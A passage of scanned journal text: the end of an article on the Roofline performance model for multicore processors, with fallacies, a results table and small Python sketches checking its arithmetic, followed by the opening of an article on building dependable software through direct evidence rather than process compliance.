Fallacy: The model does not account for all features of modern processors (such as caches and prefetching). The definition of operational intensity we use here does indeed factor in caches; memory accesses are measured between the caches and memory, not between the processor and caches. In our discussion of performance models, we showed that the memory bandwidth measures of the computer include prefetching and any other optimization (such as blocking) that can improve memory performance. Similarly, some of the optimizations in Table 3 explicitly involve memory. Moreover, in our discussion on tying the 3Cs to operational intensity, we demonstrated the optimizations’ effect on increasing operational intensity by reducing capacity and conflict misses.

Fallacy: Doubling cache size increases operational intensity. Autotuning three of the four kernels gets very close to the compulsory memory traffic; the resultant working set is sometimes only a small fraction of the cache. Increasing cache size helps only with capacity misses and possibly conflict misses, so a larger cache has no effect on the operational intensity for the three kernels. However, for 128³ 3D FFT, a larger cache could capture a whole plane of a 3D cube, improving operational intensity by reducing capacity and conflict misses.

Fallacy: The model doesn’t account for the long memory latency. The ceilings for no software prefetching in Figures 3 and 4 are at lower memory bandwidth precisely because they cannot hide the long memory latency.

Fallacy: The model ignores integer units in floating-point programs, possibly limiting performance. For the example kernels we’ve outlined here, the amount of integer code and integer performance can affect performance. For example, the Sun UltraSPARC T2+ fetches two instructions per core per clock cycle and doesn’t implement the SIMD instructions of the x86 that can operate on two double-precision floating-point operands at a time. Relative to other processors, the T2+ expends a larger fraction of its instruction issue bandwidth on integer instructions and executes them at a lower rate, hurting overall performance.

Fallacy: The model has nothing to do with multicore. Little’s Law dictates that considerable concurrency is necessary to really push the limits of the memory system. This concurrency is more easily satisfied in a multicore than in a uniprocessor. While the bandwidth orientation of the Roofline model certainly works for uniprocessors, it is even more helpful for multicores.
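Little’s Law makes the concurrency requirement concrete: the data that must be in flight equals bandwidth times latency. The minimal Python sketch below uses hypothetical round numbers (16 GB/sec, 100 ns latency, 64-byte lines), not measurements of any machine discussed here.

```python
import math


def bytes_in_flight(bandwidth_gbs: float, latency_ns: float) -> float:
    """Little's Law: concurrency = throughput x latency.

    GB/sec times nanoseconds is bytes (1e9 B/s * 1e-9 s), so no scaling is needed.
    """
    return bandwidth_gbs * latency_ns


def lines_in_flight(bandwidth_gbs: float, latency_ns: float, line_bytes: int = 64) -> int:
    """Outstanding cache-line requests needed to sustain the bandwidth."""
    return math.ceil(bytes_in_flight(bandwidth_gbs, latency_ns) / line_bytes)


# Hypothetical system: 16 GB/sec sustained bandwidth, 100 ns memory latency.
print(bytes_in_flight(16.0, 100.0))  # 1600.0
print(lines_in_flight(16.0, 100.0))  # 25
```

Spreading 25 outstanding line requests across several cores or threads is easier than sustaining them from one, which is the multicore point made above.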

Fallacy: You need to recalculate the Roofline model for every kernel. The Roofline needs to be calculated for given performance metrics and computers just once; it then guides the implementation for any program for which that metric is the critical performance metric. The kernels we’ve explored here use floating-point operations and main memory traffic. The ceilings are measured once but can be reordered depending on whether or not multiplies and adds are naturally balanced in the kernel (see the earlier discussion on adding ceilings to the model).

Note that the heights of the ceilings 
we discuss here document the maxi- 
mum potential gain of a code perform- 
ing this optimization. An interesting 
future direction is to use performance 
counters to adjust the height of the 
ceilings and the order of the ceilings 
for a particular kernel to show the ac- 
tual benefits of each optimization and 
the recommended order to try them 
(see online Appendix A.3). 

Fallacy: The model is limited to eas- 
ily optimized kernels that never hit in the 
cache. These kernels do indeed hit in 
the cache; for example, the cache-hit 
rates of our three multicores with on- 
chip caches are at least 94% for Sten- 
cil and 98% for FFT. Moreover, if the 
Seven Dwarfs were easy to optimize, it 
would bode well for the future of multi- 
cores. However, our experience is that 
it is not easy to create the fastest ver- 
sion of these numerical methods on 
the divergent multicore architectures 
discussed here. Indeed, three of the results were judged significant enough to be accepted for publication at major conferences.

Fallacy: The model is limited to floating-point programs. Our focus here has been on floating-point programs, so the two axes of the model are floating-point operations per second and the floating-point operational intensity of accesses to main memory. However, the Roofline model can work for other kernels where performance is a function of different performance metrics. A concrete example is the transpose phase of 3D FFT, which performs no floating-point operations at all. Figure 5 shows a Roofline model for just this phase on Cell, with exchanges replacing Flops in the model. One exchange involves reading and writing 16B, so its operational intensity is 1/32 pairwise Exchanges/Byte. Despite the computational metric being memory exchanges, there is still a computational horizontal Roofline, since local stores and caches could affect the number of exchanges that go to DRAM.

Table 4: Achieved performance and nearest Roofline ceilings, with metric limiting performance in bold (3D FFT is 128³)

Computer | Kernel | Upper ceiling type | Upper ceiling name | Upper ceiling value | Achieved compute | Achieved memory | O.I. | Lower ceiling type | Lower ceiling name | Lower ceiling value
Intel Xeon | SpMV | Memory | Stream BW | 11.2 GB/sec | 2.8 GFlops/sec | 11.1 GB/sec | 0.25 | Memory | Snoop filter | 5.9 GB/sec
Intel Xeon | LBMHD | Memory | Snoop filter | 5.9 GB/sec | 5.6 GFlops/sec | 5.3 GB/sec | 1.07 | Memory | (none) | 0.0 GB/sec
Intel Xeon | Stencil | Memory | Snoop filter | 5.9 GB/sec | 2.5 GFlops/sec | 5.1 GB/sec | 0.50 | Memory | (none) | 0.0 GB/sec
Intel Xeon | 3D FFT | Memory | Snoop filter | 5.9 GB/sec | 9.7 GFlops/sec | 5.9 GB/sec | 1.64 | Compute | TLP only | 6.2 GFlops/sec
AMD X4 | SpMV | Memory | Stream BW | 17.6 GB/sec | 4.2 GFlops/sec | 16.8 GB/sec | 0.25 | Memory | Copy BW | 13.9 GB/sec
AMD X4 | LBMHD | Memory | Copy BW | 13.9 GB/sec | 11.4 GFlops/sec | 10.7 GB/sec | 1.07 | Memory | No affinity | 7.0 GB/sec
AMD X4 | Stencil | Memory | Stream BW | 17.6 GB/sec | 8.0 GFlops/sec | 16.0 GB/sec | 0.50 | Memory | Copy BW | 13.9 GB/sec
AMD X4 | 3D FFT | Memory | Copy BW | 13.9 GB/sec | 14.0 GFlops/sec | 8.6 GB/sec | 1.64 | Memory | No affinity | 7.0 GB/sec
Sun T2+ | SpMV | Memory | Stream BW | 36.7 GB/sec | 7.3 GFlops/sec | 29.1 GB/sec | 0.25 | Memory | No affinity | 19.8 GB/sec
Sun T2+ | LBMHD | Memory | No affinity | 19.8 GB/sec | 10.5 GFlops/sec | 15.0 GB/sec | 0.70 | Compute | 25% issued FP | 9.3 GFlops/sec
Sun T2+ | Stencil | Compute | 25% issued FP | 9.3 GFlops/sec | 6.8 GFlops/sec | 20.3 GB/sec | 0.33 | Memory | No affinity | 19.8 GB/sec
Sun T2+ | 3D FFT | Compute | Peak DP | 19.8 GFlops/sec | 9.2 GFlops/sec | 10.0 GB/sec | 1.09 | Compute | 25% issued FP | 9.3 GFlops/sec
IBM Cell | SpMV | Memory | Stream BW | 47.6 GB/sec | 11.8 GFlops/sec | 47.1 GB/sec | 0.25 | Memory | FMA | 7.3 GFlops/sec
IBM Cell | LBMHD | Memory | No affinity | 23.8 GB/sec | 16.7 GFlops/sec | 15.6 GB/sec | 1.07 | Memory | Without FMA | 14.6 GFlops/sec
IBM Cell | Stencil | Compute | Without FMA | 14.6 GFlops/sec | 14.2 GFlops/sec | 30.2 GB/sec | 0.47 | Memory | No affinity | 23.8 GB/sec
IBM Cell | 3D FFT | Compute | Peak DP | 29.3 GFlops/sec | 15.7 GFlops/sec | 14.4 GB/sec | 1.09 | Compute | SIMD | 14.6 GFlops/sec

Fallacy: The Roofline model must 
use DRAM bandwidth. If the working 
set fits in the L2 cache, the diagonal 
Roofline could be L2 cache bandwidth 
instead of DRAM bandwidth, and the 
operational intensity on the x-axis 
would be based on Flops per L2 cache 
Byte accessed. The diagonal memory 
performance line would move up, and 
the ridge point would surely move to 
the left. For example, Jike Chong of the University of California, Berkeley, ported two financial partial differential equation (PDE) solvers to four other multicore computers: the Intel Penryn and Larrabee and the NVIDIA G80 and GTX280. He used the Roofline model to keep track of the peak arithmetic throughput and the L1, L2, and DRAM bandwidths of all four. By analyzing an algorithm’s working set and operational intensity, he was able to use the Roofline model to quickly estimate the need for algorithmic improvement. Specifically, for the option-pricing problem with an implicit PDE solver, the working set is small enough to fit into L1, and the L1 bandwidth is sufficient to support peak arithmetic throughput; the Roofline model thus indicates that no optimization is necessary. For option pricing with an explicit PDE formulation, the working set is too large to fit into cache, and the Roofline model helps indicate the extent to which cache blocking is necessary to produce peak arithmetic performance.
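A minimal Python sketch of the bound behind this fallacy: attainable performance is the lower of peak compute and bandwidth times operational intensity, and the ridge point is peak divided by bandwidth. The machine figures below (100 GFlops/sec peak, 20 GB/sec DRAM, 100 GB/sec L2) are hypothetical, not measurements of any computer discussed here, and the sketch assumes operational intensity is counted per byte at whichever level of the memory hierarchy is being plotted.

```python
def attainable_gflops(peak_gflops: float, bandwidth_gbs: float,
                      operational_intensity: float) -> float:
    """Roofline bound: the lower of the compute roof and the bandwidth roof.

    operational_intensity is in Flops per byte of the traffic level whose
    bandwidth is given (DRAM bytes for a DRAM roof, L2 bytes for an L2 roof).
    """
    return min(peak_gflops, bandwidth_gbs * operational_intensity)


def ridge_point(peak_gflops: float, bandwidth_gbs: float) -> float:
    """Operational intensity (Flops/Byte) where the diagonal meets the flat roof."""
    return peak_gflops / bandwidth_gbs


# Hypothetical machine: 100 GFlops/sec peak, 20 GB/sec DRAM, 100 GB/sec L2.
PEAK = 100.0
DRAM_BW = 20.0
L2_BW = 100.0

if __name__ == "__main__":
    print("DRAM ridge:", ridge_point(PEAK, DRAM_BW))  # 5.0 Flops/Byte
    print("L2 ridge:", ridge_point(PEAK, L2_BW))      # 1.0 Flops/Byte
    # A kernel doing 2 Flops per byte at the level being plotted:
    print(attainable_gflops(PEAK, DRAM_BW, 2.0))      # 40.0 (memory-bound)
    print(attainable_gflops(PEAK, L2_BW, 2.0))        # 100.0 (compute-bound)
```

Raising the diagonal from DRAM to L2 bandwidth moves the ridge point from 5 to 1 Flops/Byte in this example, so a kernel at 2 Flops per byte reaches the flat roof. The 2 Flops/Byte is a per-level figure: a kernel's Flops per L2 byte is generally not the same as its Flops per DRAM byte.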


Conclusion 
The sea change from sequential com- 
puting to parallel computing is in- 
creasing the diversity of computers 
that programmers must confront 
when building correct, efficient, scal- 
able, portable software.‘ Here, we’ve 
described a simple, visual computa- 
tional model we call the Roofline Mod- 
el to help identify which systems would 
be a good match for important kernels 
or conversely to determine how to 
change kernel code or hardware to run 
desired kernels well. For floating-point kernels that do not fit completely in caches, we’ve shown how operational intensity (the number of floating-point operations per byte transferred from DRAM) is an important parameter for both the kernels and the multicore computers.

We applied Roofline to four kernels from among the Seven Dwarfs to four recent multicore designs: AMD Opteron X4, Intel Xeon, IBM Cell, and Sun T2+. The ridge point, the minimum operational intensity needed to achieve maximum performance, proved to be a better predictor of performance than clock rate or peak performance. Cell offered the highest attained performance (GFlops/sec) on these kernels, but T2+ was the easiest computer on which to achieve its highest performance. One reason is that the ridge point of the Roofline Model for T2+ was the lowest.

Just as the graphical Roofline Model offers insights into the difficulty of achieving the peak performance of a computer, it also makes obvious when a computer is imbalanced. The operational ridge points for the two x86 computers were 4.4 and 6.7, meaning 35 to 55 Flops per 8-byte operand that accesses DRAM, yet the operational intensities for the 16 combinations of kernels and computers in Table 4 ranged from 0.25 to just 1.64, with a median of 0.60 Flops/Byte. Architects should keep the ridge point in mind if they want programs to reach peak performance on their new designs.
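The arithmetic in this paragraph can be checked in a few lines of Python. The sketch converts the two x86 ridge points to Flops per 8-byte (double-precision) operand and, assuming a kernel runs right on the bandwidth diagonal of the Roofline, computes the largest fraction of peak a kernel at the median operational intensity could reach (intensity divided by ridge point, capped at 1). Applying the overall median of all 16 combinations to the x86 machines alone is a simplification made here for illustration.

```python
X86_RIDGE_POINTS = [4.4, 6.7]   # Flops/Byte, from the text
MEDIAN_OI = 0.60                # median operational intensity in Table 4
BYTES_PER_OPERAND = 8           # one double-precision value


def flops_per_operand(ridge_point: float) -> float:
    """Flops needed per 8-byte DRAM operand to reach the ridge point."""
    return ridge_point * BYTES_PER_OPERAND


def max_fraction_of_peak(operational_intensity: float, ridge_point: float) -> float:
    """Best case left of the ridge: attainable = peak * (OI / ridge)."""
    return min(1.0, operational_intensity / ridge_point)


if __name__ == "__main__":
    for ridge in X86_RIDGE_POINTS:
        print(f"ridge {ridge}: {flops_per_operand(ridge):.1f} Flops per operand, "
              f"median kernel reaches at most "
              f"{max_fraction_of_peak(MEDIAN_OI, ridge):.0%} of peak")
```

For these two ridge points, a kernel at the median intensity can reach at most about 14% and 9% of peak, which is the imbalance the paragraph points to.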

We measured the roofline and ceil- 
ings using microbenchmarks but 
could have used performance coun- 
ters (see online Appendix A.1 and 
A.3). There may indeed be a synergis- 
tic relationship between performance 
counters and the Roofline Model. The 
requirements for automatic creation 
of a Roofline model could guide the 
designer as to which metrics should 
be collected when faced with literally 
hundreds of candidates but only a lim- 
ited hardware budget.° 

Roofline offers insights into other 
types of multicore systems (such as vec- 
tor processors and graphical process- 
ing units); other kernels (such as sort 
and ray tracing); other computational 
metrics (such as pair-wise sorts per 
second and frames per second); and 
other traffic metrics (such as L3 cache 
bandwidth and I/O bandwidth). Alas, 
there are many more opportunities 
for Roofline-oriented research than we
can pursue. We thus invite others to 
join us in the exploration of the effec- 
tiveness of the Roofline Model. 
A Direct Path to Dependable Software


Software plays a fundamental role in our society, bringing enormous benefits to all fields. But because many of our current systems are highly centralized and tightly coupled, we are also susceptible to massive and coordinated failure.

A Chicago hospital lost its entire pharmacy database one night, and it was only able to reconstruct medication records for its patients by collecting paper printouts from nurses’ stations. In their report on this incident, Richard Cook and Michael O’Connor concluded: “Accidents are signals sent from deep within the system about the sorts of vulnerability and potential for disaster that lie within.”


Similar signals have been sent, for example, in the fields of electronic voting, air traffic control, nuclear power, and energy distribution.


The growing tendency to embed 
software in powerful and invasive physical devices brings
greater risk, especially in medi- 
cine, where software can save lives 
but also kill.°° Software problems 
led to the recall of 200,000 implanted 
pacemakers and defibrillators between 
1990 and 2000.* In the 20 years prior to 
2005, the U.S. Food and Drug Adminis- 
tration (FDA) recorded 30,000 deaths 
and 600,000 injuries from medical- 
device failures.” How many of these in- 
cidents can be attributed to software is 
unclear, though separate studies have 
found that about 8% of medical-device 
recalls are software-related. Moreover, 
few of the device failures that occur— 
perhaps only 1 in 40—are actually re- 
ported," so the actual incidence of in- 
juries is likely to be higher. 

What would it take to make soft- 
ware more dependable? Until now, 
most approaches have been indirect, 
involving practices—processes, tools, or 
techniques—believed to yield depend- 
able software. The case for dependability 
has thus rested on the extent to which 
the developers adhered to these practices. This article argues that developers should instead produce direct evidence of their software’s dependability. The potential advantages of this approach are greater credibility (as the claim is not contingent on the effectiveness of the practices) and reduced cost (because development resources can be focused where they have the most impact).


The Need for a Direct Approach 
A dependable system is one you can depend on, that is, one in which you can place your trust. A rational person or organization only does this with evidence that the system’s benefits far outweigh its risks. Without such evidence, a system cannot be depended on, in much the same way that a download from an unknown Web site cannot be said to be “safe” just because it happens not to harbor a virus. Perhaps in the future we will know enough about software-development practices that the very use of a particular technique will constitute evidence of the resulting software’s quality. Today, however, we are far from that goal. Although individual companies can predict defect rates within product families based on historical data, industrywide data collection and analysis barely exist.

Contrast software systems with cars, 
for example. In the U.S., the National 
Highway Traffic Safety Administra- 
tion (NHTSA) maintains several data- 
bases that include records of all fatal 
accidents—approximately 40,000 a 
year—and data about how particular 
models fare in crashes. Researchers 
can use this data to correlate risk with 
design features. NHTSA also receives 
data from auto companies regarding 
warranty claims, defects, and customer 
complaints. Similarly, the National 
Transportation Safety Board (NTSB), 
best known for its work in aviation, 
analyzes highway accidents and issues 
reports on, among other things, the ef- 
ficacy of safety devices such as seatbelts 
and airbags. 

The software industry has no com- 
parable mechanism, and as a society 
we have almost no data on the causes 
or effects of software failure. Producers 
of software therefore cannot benefit 
from industry data that would improve 
their designs and development strate- 
gies, and consumers cannot use such 
data to make informed purchasing decisions.

Actually, where data is collected, it 
is often suppressed; many companies 
withhold even basic information about 
the number and severity of defects 
in their products, even when issuing 
patches that purport to resolve them. 
And no government agency is charged 
with investigating software failures or 
even recording software-related fatal accidents. When an accident report does implicate software, it rarely includes enough information to allow any general lessons to be learned.

Over the past few decades we have 
developed approaches and technolo- 
gies that can dramatically improve the 
quality of software. They include better 
platforms (safe programming languag- 
es, operating systems with address- 
space separation, virtual machines), 
better development infrastructure (configuration control, bug tracking, traceability), better processes (spiral and agile models, prototyping), and better tools (integrated environments, static analyzers, model checkers).
Moreover, we have made progress in 
understanding the fundamentals, for 
example, of problem structuring, de- 
sign modeling, software architecture, 
verification, and testing. All of these 
advances can be misused, however, 
and none of them guarantees success. 
The field of empirical software develop- 
ment is attempting to fill the gap and 
provide scientific measures of efficacy, 
but there is still no evidence compel- 
ling enough that simply using a given 
approach establishes with confidence 
the quality of the resulting system. 
Many certification standards were 
devised with the good intent of enforc- 
ing best practices, but they have had 
the opposite effect. Instead of encour- 
aging the selection of the best tool for 
the job, and directing attention to the 
most critical aspects of a system and 
its development, they impose burden- 
some demands to apply the same—of- 
ten outdated—techniques uniformly, 
resulting in voluminous documentation of questionable value. The Common Criteria security certification that Microsoft obtains for its operating systems, for example, costs more than its internally devised mitigations but is believed by the company to be far less effective.

Government agencies are often in the unfortunate position of having to evaluate complex software systems solely on the basis of evidence that some process, however arbitrary, was adhered to and some amount of testing, whether conclusive or not, was performed. Not surprisingly, certified systems sometimes fail catastrophically. A particularly tragic example was the failure of an FDA-certified radiation-therapy machine in Panama in 2001; fatal overdoses resulted from poorly engineered software in an incident reminiscent of the Therac failures of 15 years earlier. Even the most highly regarded standards demand expensive practices whose value is hard to assess. DO-178B, for example, the safety standard used in the U.S. for avionics systems, requires a level of test coverage known as MC/DC that is extremely costly and whose benefits studies have yet to substantiate.

A very different approach, sometimes called “goal-based” or “case-based” certification, is now gaining currency. Instead of particular practices being mandated, the developer is called upon to provide direct evidence that the particular system satisfies its claimed dependability goals. In the U.K., the Ministry of Defence has dramatically simplified its procurement standards for software under this approach, with contractors providing “software reliability cases” to justify the system. Even in the early stages, a reliability case is required to defend the proposed architecture and to show that the contractor is capable of making a case for the development itself.

This direct approach has not yet been adopted by American certifiers and procurers. Recently, however, a number of government agencies, spearheaded by the High Confidence Software and Systems Coordinating Group, funded a National Academies study to address widespread concerns about the costs and effectiveness of existing approaches to software dependability. The direct approach recommended by the study is the basis of this article.


Why Testing Isn’t Good Enough
Testing is a crucial tool in the software developer’s repertoire, and the use of automated tests, especially “regression tests” for catching defects introduced by modifications, is a mark of competence. More extensive testing can only improve the quality of software, and many researchers are recognizing the potential for harnessing computational resources to increase the power of testing yet further. At the same time, however, despite the famous pronouncement of Edsger Dijkstra that testing can be used to show the presence of errors but not their absence, there is a widespread folk belief that testing is sufficient evidence for dependability.

Everything we know about testing indicates that this belief is false. Although some small components can be
tested exhaustively, the state space of 
an entire system is usually so huge that 
the proportion of scenarios executed 
in a typical test is vanishingly small. 
Software is not continuous, so a suc- 
cessful test for one input says nothing 
about the system’s response to a simi- 
lar but distinct input. In practice, it is 
very difficult even to achieve full code 
coverage—that is, with every statement 
of the code being executed. 
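A back-of-the-envelope calculation shows why exhaustive testing of even a small interface is out of reach. The sketch assumes a hypothetical function taking three 32-bit integer inputs and a hypothetical test rig running one billion tests per second; both figures are illustrative and do not come from the article.

```python
SECONDS_PER_YEAR = 365 * 24 * 3600  # ignores leap years


def exhaustive_test_years(input_bits: int, tests_per_second: float) -> float:
    """Years needed to try every combination of input_bits bits of input."""
    combinations = 2 ** input_bits
    return combinations / tests_per_second / SECONDS_PER_YEAR


if __name__ == "__main__":
    years = exhaustive_test_years(3 * 32, 1e9)
    print(f"{years:.2e} years")  # about 2.5e12 years
```

Even this tiny, stateless interface would take trillions of years to cover, and a real system's state space is vastly larger, so any feasible test suite samples a vanishing fraction of it.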

An alternative approach is to gener- 
ate tests in a distribution that matches 
the expected usage profile, adjusted 
for risk so that most of the testing ef- 
fort is spent in the most critical areas of 
functionality. But the number of tests 
required to obtain high confidence 
(even with some dubious statistical 
assumptions) is far larger than one might imagine. For example, to claim a failure rate of one input in a thousand with 99% confidence, about 5,000 test cases are needed, assuming no bugs are found. If testing reveals 10 bugs,
nearer to 20,000 subsequent tests with- 
out failure are needed. Contrary to the 
intuition of many programmers, find- 
ing bugs should not increase confi- 
dence that fewer bugs remain; indeed, 
it is evidence that there are more bugs 
to be found. 
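The "about 5,000" figure can be reproduced with the simplest statistical model: if each test is an independent draw from the usage profile and the true failure probability per input were p, then n consecutive failure-free tests occur with probability (1 - p)^n, and requiring this to be at most 1 - C gives n >= ln(1 - C) / ln(1 - p). The sketch below assumes that model (our choice, not necessarily the one behind the article's figures) and does not attempt the 10-bug case, which needs a different model.

```python
import math


def failure_free_tests_needed(failure_rate: float, confidence: float) -> int:
    """Smallest n with (1 - failure_rate) ** n <= 1 - confidence.

    If the true per-input failure probability were as high as failure_rate,
    a run of n failure-free tests would occur with probability at most
    1 - confidence. Assumes tests are independent draws from the usage profile.
    """
    return math.ceil(math.log(1.0 - confidence) / math.log1p(-failure_rate))


if __name__ == "__main__":
    print(failure_free_tests_needed(0.001, 0.99))  # 4603
```

The result, 4,603 failure-free tests, rounds to the article's "about 5,000"; note how quickly it grows, since each further factor of ten in the claimed failure rate multiplies it by roughly ten.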

Thus while testing may provide adequate confidence that a program is good for a noncritical application, it becomes increasingly difficult and expensive as higher levels of assurance are demanded; under such circumstances, testing cannot deliver the confidence required at a reasonable cost. Most systems will be tested more thoroughly by their users than by their developers, and will often be executing in uncharted territory, exploring combinations of state components that were not tested and perhaps not even considered during design.

Nevertheless, most certification re- 
gimes still rely primarily on testing. 
Developers and certifiers sometimes 
talk self-assuredly about achieving “five nines” of dependability, meaning that the system is expected to survive 100,000 commands or hours before failing. The mismatch between such claims and the reality of software failures led one procurer to quip “It’s amazing how quickly 10⁵ hours comes around.”
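The quip is easier to appreciate with numbers. The sketch below reads "five nines" as the article does, one failure per 10⁵ hours, converts that to years, and then divides by a fleet size to estimate how often a failure occurs somewhere in the installed base. The fleet size of 1,000 units is a hypothetical figure, and the sketch assumes independent units with a constant failure rate.

```python
HOURS_PER_YEAR = 24 * 365  # 8,760; ignores leap years


def hours_between_failures(nines: int) -> float:
    """Mean hours between failures if each hour fails with probability 10**-nines."""
    return 10.0 ** nines


def fleet_hours_between_failures(nines: int, fleet_size: int) -> float:
    """Expected hours between failures anywhere in a fleet of independent units."""
    return hours_between_failures(nines) / fleet_size


if __name__ == "__main__":
    single = hours_between_failures(5)
    print(single, "hours =", round(single / HOURS_PER_YEAR, 1), "years")
    print(fleet_hours_between_failures(5, 1000), "hours across 1,000 units")
```

A single unit would expect a failure about once every 11.4 years, but across the hypothetical fleet one arrives roughly every 100 hours, or about every four days.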


A Direct Approach 

The direct approach, by definition, is 
straightforward. The desired depend- 
ability goal is explicitly articulated as a 
collection of claims that the system has 
some critical properties. An argument, 
or dependability case, is constructed 
that substantiates the claims. The re- 
mainder of this article develops these 
notions and outlines some of their 
implications, but first we turn to the 
fundamental questions of what con- 
stitutes a system and what it means for 
the system to be dependable. 



What is a system? An engineered product that is introduced to solve a particular problem and that consists of software, the hardware platform on which the software runs, the peripheral devices through which the product interacts with the environment, and any other components that contribute to achieving the product’s goals (including human operators and users) is considered a system. In many cases, the system’s designers must assume that its operators behave in a certain way. An air traffic management system, for example, cannot prevent a midair collision if a pilot is determined to hit another aircraft; eliminating this assumption would require a separation of aircraft that would not be economically feasible. When a system’s dependability is contingent on assumptions about its operators, they should be viewed as a component of the system and the design of operating procedures regarded as an essential part of the overall design.

What does “dependable” mean? A system is dependable if it can be depended on (that is, trusted) to perform a particular task. As noted earlier, such trust is only rational when evidence of the system’s ability to act without exhibiting certain failures has been assessed. So a system cannot be dependable without evidence, and dependability is thus not merely the absence of defects or the failures that may result from them but the presence of concrete information suggesting that such failures will not occur.

As in all engineering enterprises, 
dependability is a trade-off between 
benefits and risks, with the level of as- 
surance (and the quality and cost of 
the evidence) being chosen to match 
the risk at hand. Our society is not will- 
ing to tolerate the failure of a nuclear 
power plant, air traffic control center, 
or energy distribution network, so 
for such systems we will be willing to 
absorb larger development and certification costs. Criticality depends, of course, on the context of use. A spreadsheet program becomes critical if it is used, say, for calculating radiotherapy doses. And there are systems, such as GPS satellites and cellphone networks, on which so many applications depend that widespread failure could be catastrophic.

Dependability is not a metric that 
can be measured on a simple numeric 
scale, because different kinds of fail- 
ures have very different consequences. 
The cost of preventing all failures will 
usually be prohibitive, so a dependable 
system will not offer uniform levels of 
confidence across all functions. In fact, 
a large variance is likely to be a charac- 
teristic of a dependable system. Thus 
a dependable radiotherapy system 
may become unavailable but cannot 
be allowed to overdose a patient; a de- 
pendable e-commerce site may display advertisements incorrectly, give bad search results, and perhaps lose shopping-cart items over time, but it must
never bill the wrong amount or leak 
customers’ credit card details; a de- 
pendable file synchronizer may report 
spurious conflicts but should never si- 
lently overwrite newer versions of files. 
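The file-synchronizer example can be made concrete. The following Python sketch is hypothetical and not drawn from any real synchronizer: it uses a common three-way comparison of each replica against the version recorded at the last synchronization, treats "changed since the last sync" as a stand-in for "newer", and is deliberately lopsided in the way the article describes, willing to report a conflict that a smarter tool might resolve but never overwriting a replica that has changed. File contents are modelled as opaque hash strings.

```python
from enum import Enum
from typing import Optional


class Action(Enum):
    NOTHING = "nothing"
    COPY_A_TO_B = "copy A to B"
    COPY_B_TO_A = "copy B to A"
    REPORT_CONFLICT = "report conflict"


def decide(base: Optional[str], a: str, b: str) -> Action:
    """Choose how to reconcile one file present on replicas A and B.

    base is the content hash recorded at the last successful sync, or None
    if no reliable record exists; a and b are the current hashes.
    """
    if a == b:
        return Action.NOTHING
    if base is not None and b == base:
        # Only A changed, so overwriting B cannot destroy newer work.
        return Action.COPY_A_TO_B
    if base is not None and a == base:
        # Only B changed, so overwriting A cannot destroy newer work.
        return Action.COPY_B_TO_A
    # Both changed, or history is unknown: possibly spurious, but never silent.
    return Action.REPORT_CONFLICT


if __name__ == "__main__":
    print(decide("h1", "h2", "h1"))  # Action.COPY_A_TO_B
    print(decide(None, "h2", "h3"))  # Action.REPORT_CONFLICT
```

The final branch is where the design spends its variance: a spurious conflict report costs the user a moment, while a wrong copy would silently destroy work.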

Together, these considerations im- 
ply that the first steps in developing a 
dependable system involve drawing 
its boundaries—deciding which com- 
ponents in addition to the software, 
physical and human, will be relied on; 
identifying the critical properties; and determining what level of confidence is required.

Properties and where they reside. So far I have talked loosely about a dependable system performing some functions or tasks. But for articulating claims about a system’s desired behavior, this level of granularity is too coarse. It is preferable instead to focus on critical properties. Some will be associated with individual functions, but more often a property will crosscut several functions.

For dependability, focusing on properties is generally better than focusing on functions because the properties are what matter. Moreover, they can usually be separated more cleanly from one another, and they retain their meaning as the set of functions offered by the system changes over its lifetime. A critical property of a crime database, for example, may be that every access to the database by a user is logged in some file. Identifying instead some critical subset of logging functions would be inferior, as the full correctness of these functions would likely be neither necessary nor sufficient for establishing the logging property. Common Criteria, a certification scheme for security, makes this mistake; it focuses attention on the security functions alone, despite the fact that many attacks succeed precisely because they exploit loopholes in other functions that were not thought to be security-related.
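One way to see the difference is to state the logging property once, as a check over an audit trace, independent of which functions performed the accesses. The event format and names below (AccessEvent, LogEntry, request ids) are hypothetical, and the sketch assumes access events can be observed at the database layer regardless of the code path that caused them.

```python
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class AccessEvent:
    request_id: int
    user: str
    record: str


@dataclass(frozen=True)
class LogEntry:
    request_id: int
    user: str
    record: str


def unlogged_accesses(accesses: Iterable[AccessEvent],
                      log: Iterable[LogEntry]) -> List[AccessEvent]:
    """Return every access with no matching log entry (empty list: property holds)."""
    logged = {(e.request_id, e.user, e.record) for e in log}
    return [a for a in accesses
            if (a.request_id, a.user, a.record) not in logged]


if __name__ == "__main__":
    accesses = [AccessEvent(1, "alice", "r17"), AccessEvent(2, "bob", "r42")]
    log = [LogEntry(1, "alice", "r17")]
    print(unlogged_accesses(accesses, log))
```

Because the check mentions only accesses and log entries, it keeps its meaning when new query functions are added, which is exactly where a function-by-function list of "logging functions" would leave a gap.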
Some software systems provide an 
entirely virtual service, but most in- 
teract with the physical world. When 
the purpose of a system is to produce, 
control, or monitor particular physi- 
cal phenomena, they should form 
the vocabulary for expressing critical 
properties. This might seem obvious, but there is a long tradition of writing requirements in terms of interfaces closer to the software, perhaps because it’s easier or because of a division of labor that isolates software engineers from system-level concerns. In a radiotherapy application, for example, a critical property is not that the emitted beam has a bounded intensity, or
that the right signal is conveyed to the 
beam-generating device, or that the 
beam settings are computed correctly 
in the code. It is that the patient does 
not receive an excessive dose. 

There is a chain of events connecting the ultimate physical effects of the system at one end back through the signals of the peripherals in the middle to the instructions executed in the code
at the other end. The more the critical 
property is formulated using phenom- 
ena closer to the software and further 
away from the ultimate effects in the 
real world, the more its correlation to 
the fundamental concerns of the users 
is weakened. 

An infamous accident illustrates the potentially dire consequences of this too-close-to-the-software tendency. An Airbus A320 landing at Warsaw Airport in 1993 was equipped with an interlock intended to prevent the pilot from activating reverse thrust while airborne. Unfortunately, the software had been designed to meet a requirement that reverse thrust be disabled unless wheel pulses were being received (indicating that the wheels were turning and thus in contact with the ground). Because of rain on the runway, the aircraft aquaplaned when it touched down, and the wheels did not turn, so the software dutifully disabled reverse thrust and the aircraft overran the runway. Had the critical property been expressed in terms of being on the ground rather than receiving wheel pulses, the invalid assumption that they were equivalent might have been scrutinized more carefully and the flaw detected. (This account is simplified; for the full incident report see Ladkin.)
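The difference between the two formulations can be sketched in code. Both functions below are hypothetical simplifications, not the A320's actual logic, and are not a claim about what would have prevented the accident: the first encodes the requirement as stated in terms of wheel pulses; the second states the property in terms of being on the ground, which forces the question of what evidence shows ground contact (here, a hypothetical weight-on-wheels signal alongside wheel rotation).

```python
from dataclasses import dataclass


@dataclass
class Sensors:
    wheel_pulses: bool       # main wheels are spinning
    weight_on_wheels: bool   # hypothetical: landing-gear struts compressed


def reverse_thrust_allowed_as_specified(s: Sensors) -> bool:
    # Requirement phrased close to the software: silently equates
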